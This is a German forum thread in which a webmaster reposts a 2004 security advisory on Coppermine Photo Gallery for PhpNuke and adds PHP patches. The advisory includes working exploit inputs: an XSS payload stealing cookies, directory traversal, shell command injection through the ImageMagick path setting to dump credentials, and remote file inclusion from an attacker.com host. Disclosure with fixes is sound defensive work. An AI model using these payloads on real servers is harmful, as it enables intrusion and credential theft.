[x] Navigation

[x] Languages

[x] Design
Each user can view the site with a different theme.
Themes marked with a * also change the forum look.

Coppermine 1.2x security exploits

Dieses Forum ist gesperrt, Du kannst keine Beiträge editieren, schreiben oder beantworten.    Dieses Thema ist gesperrt, Du kannst keine Beiträge editieren oder beantworten.    Druckversion     Foren-Übersicht ›  Coppermine Gallery Bugs

Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
DJMaze
Webmaster
Webmaster

Offline Offline
Dabei seit: Apr 16, 2004
Beiträge: 14
Wohnort: Netherlands
BeitragVerfasst am: 01.05.2004 17:33
Titel: Coppermine 1.2x security exploits

Most of this is accesible thru a hacked admin account.
Since CPG-Nuke has secure admin it is hard to break in, but when they get in you could loose everything, so read.

Thanks to Maku for notifying Ausruf

Array:
{================================================================================}
{ [waraxe-2004-SA#026] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: www.waraxe.us/index.ph...&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003 Grégory DEMAR <gdemar@wanadoo.fr>
www.chezgreg.net/coppermine/
Updated by the Coppermine Dev Team coppermine.sf.net/team/
New Port by GoldenTroll
coppermine.findhere.org/
Based on coppermine 1.1d by Surf www.surf4all.net/
coppermine.findhere.org

I have tested two versions of the Coppermine: 1.2.2b and 1.2.0 RC4, which i will name
further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in Coppermine software package are not protected against direct access,
therefore standard php error messages can be provoked, which leads to exposure the full
path to the scripts. Such piece of information has great value for potential attacker, who
will use this in next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

localhost/nuke72/modul...hpinfo.php
localhost/nuke72/modul...addpic.php
localhost/nuke72/modul...config.php
localhost/nuke72/modul..._input.php
localhost/nuke72/modul...yecard.php
localhost/nuke72/modul.../ecard.php
localhost/nuke72/modul...op.inc.php
FIXES Add a die() line (seems they got lost along the way after a merge of standalone and cms version:

phpinfo.php
PHP:
if (!defined('IN_COPPERMINE')) DIE();
function
cpgGetPhpinfoConf($search)

addpic.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
die (
"You can't access this file directly...");
}
define('ADDPIC_PHP', true);
define('NO_HEADER', true);
require(
"modules/" . $name . "/include/load.inc.php");

config.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
die (
"You can't access this file directly...");
}
define('CONFIG_PHP', true);
require(
"modules/" . $name . "/include/load.inc.php");

db_input.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
die (
"You can't access this file directly...");
}
define('DB_INPUT_PHP', true);
require(
"modules/" . $name . "/include/load.inc.php");

displayecard.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
die (
"You can't access this file directly...");
}
define('DISPLAYECARD_PHP', true);
require(
"modules/" . $name . "/include/load.inc.php");

ecard.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
die (
"You can't access this file directly...");
}
define('ECARDS_PHP', true);
require(
"modules/" . $name . "/include/load.inc.php");

include/crop.inc.php
PHP:
if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');
// ////////////////// Variables //////////////////////////////
// used texts
$txt['bigger'] = ">";

Array:
B. Cross-site scripting aka XSS:

Can be used by potential attacker for stealing cookies and doing other operations, which in
normal conditions are not permitted by browser's cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

localhost/nuke72/modul...URL=foobar">[xss code here]
localhost/nuke72/modul...URL=foobar"><body%20onload=alert(document.cookie);>

REMOVE menu.inc.php

Array:
C. Arbitrary directory browsing (needs nuke admin rights!):

PhpNuke is known by the many security bugs, leading to admin account overtaking by attacker.
So needing of the admin rights to use this exploit is not such big restriction ...

Version scope: both new and old versions are affected.

Example:

localhost/nuke72/modul...tdir=../..

... and we can see PhpNuke's root directory structure zwinker
searchnew.php
PHP:
function getallpicindb(&$pic_array, $startdir)
{
global
$CONFIG;
if (
ereg('..', $startdir)) die('Access denied'); // thanks to waraxe for finding this admin vulnerability
$sql = "SELECT filepath, filename " . "FROM {$CONFIG['TABLE_PICTURES']} " . "WHERE filepath LIKE '$startdir%'";
$result = db_query($sql);

Array:
D. Execution of the arbitrary shell commands in server (needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin account.

Version scope: both new and old versions are affected.

So, how we can give any shell commands to server?
Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":


// Method for thumbnails creation
switch ($method) {
case "im" :
if (preg_match("#[A-Z]:|\\\\#Ai", __FILE__)) {
// get the basedir, remove '/include'
$cur_dir = "";
$src_file = '"' . strtr($src_file, '/', '\\') . '"';
$im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '\\') . '"'));
} else {
$src_file = escapeshellarg($src_file);
$im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
}

$output = array();
$cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";

//die("$cmd");

exec ($cmd, $output, $retval);

if ($retval) {
$ERROR = "Error executing ImageMagick - Return value: $retval";
if ($CONFIG['debug_mode']) {

As we can see, there is very dangerous php function "exec()" in use and some user input -
variables "$src_file" and "$dest_file" - are sanitized by "escapeshellarg()". All seems to be ok?
Yes... oops... what about config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ?
Coppermine's authors were assuming, that those variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate those configuration parameters and therefore
various shell commands can be injected to "exec()"!
You wanna details? Go to Coopermine's conficuration panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to value, which includes shell command, you want to execute in server.
Example "path" in case of windows server: "type config.php > config.txt &" ,
linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some pictures to server and go to "Batch add pictures".
And if all went right, then you will see "config.txt" file in phpnuke root directory, so anyone can
see in plaintext information with critical value - database name, username and password zwinker
Of course, skilled attacker can within 5 minutes get remote shell running in server through
arbitrary port (higher than 1024) and next hacking is not logged anymore, because webserver is bypassed.
One more step - finding and using local r00t exploit - and server is 0wned zwinker

include/picmgmt.inc.php AND include/picmgmtbatch.inc.php
PHP:
    // try to get more memory for executing large pictures -> DJMaze
ini_set("memory_limit", "32M");
// Method for thumbnails creation
$CONFIG['jpeg_qual'] = escapeshellarg($CONFIG['jpeg_qual']);
$CONFIG['im_options'] = escapeshellarg($CONFIG['im_options']);
switch (
$method) {

Array:
E. Remote file inclusion:

Version scope: both new and old versions are affected (different bugs in different scripts).

There exists remote file inclusion vulnerabilities in Coppermine Photo Gallery, which
can lead to arbitrary php code parsing, shell commands injection, etc. And as discussed before,
finally this can lead to total compromise of the victim server.

E1 - affected is old version:

First get ready your php script in "http://attacker.com/include/functions.inc.php" and then:

localhost/nuke69j1/mod...tacker.com



E2 - affected is new version:

First get ready your php script in "http://attacker.com/user_list_info_box.inc" and then:

localhost/nuke72/modul...tacker.com
localhost/nuke72/modul...tacker.com
localhost/nuke72/modul...tacker.com

Of course, attacker's server, where those scripts are, must NOT PARSE PHP!!

See ya!

open your theme.php
PHP:
/* (at your option) any later version.                                      */
/****************************************************************************/
/* $Id: theme.php,v 1.6 2004/04/08 08:23:42 gtroll Exp $ */
/****************************************************************************/
if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

Array:
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe @ yahoo.com
Janek Vind "waraxe"

Homepage: www.waraxe.us/


DJMaze please enter your server specs in your user profile! traurig
Nach oben
Benutzer-Profile anzeigen Website dieses Benutzers besuchen
clubhouse
Special-Agent
Special-Agent

Offline Offline
Dabei seit: Nov 04, 2004
Beiträge: 478
Wohnort: Eine Insel mit 2 Bergen
BeitragVerfasst am: 08.03.2005 17:16
Titel: Re: Coppermine 1.2x security exploits

wer solln da so schnell durch steigen?

_________________


clubhouse's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux Debian 4.0 / PHP 5.2.0-8+etch13 / SQL 5.0.32 / CMS 9.2.1
Nach oben
Benutzer-Profile anzeigen Website dieses Benutzers besuchen ICQ-Nummer
Ertan
Webmaster
Webmaster

Offline Offline
Dabei seit: Mar 19, 2004
Beiträge: 1264
Wohnort: Germany
BeitragVerfasst am: 08.03.2005 17:43
Titel: Re: Coppermine 1.2x security exploits

"stop this !!!!!!!!!!!"
jetzt wirst du wohl noch weniger antworten hier bekommen zwinker

_________________
.: USE THE FORCE :.
Helft mit ! Keine Unbeantworteten Beiträge mehr

Ertan's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Nach oben
Benutzer-Profile anzeigen E-Mail an diesen Benutzer senden Website dieses Benutzers besuchen Bildergalerie
Beiträge der letzten Zeit anzeigen:   
Dieses Forum ist gesperrt, Du kannst keine Beiträge editieren, schreiben oder beantworten.    Dieses Thema ist gesperrt, Du kannst keine Beiträge editieren oder beantworten.    Druckversion    Foren-Übersicht ›  Coppermine Gallery Bugs
Seite 1 von 1
Alle Zeitangaben sind in GMT + 1 Stunden



Gehe zu:  


Du kannst keine Beiträge schreiben.
Du kannst auf Beiträge nicht antworten.
Du kannst Deine Beiträge nicht bearbeiten.
Du kannst Deine Beiträge nicht löschen.
Du kannst an Umfragen nicht mitmachen.
Du kannst keine Dateien anhängen.
Du kannst keine Dateien herunterladen.




Interactive software released under GNU GPL, Code Credits, Privacy Policy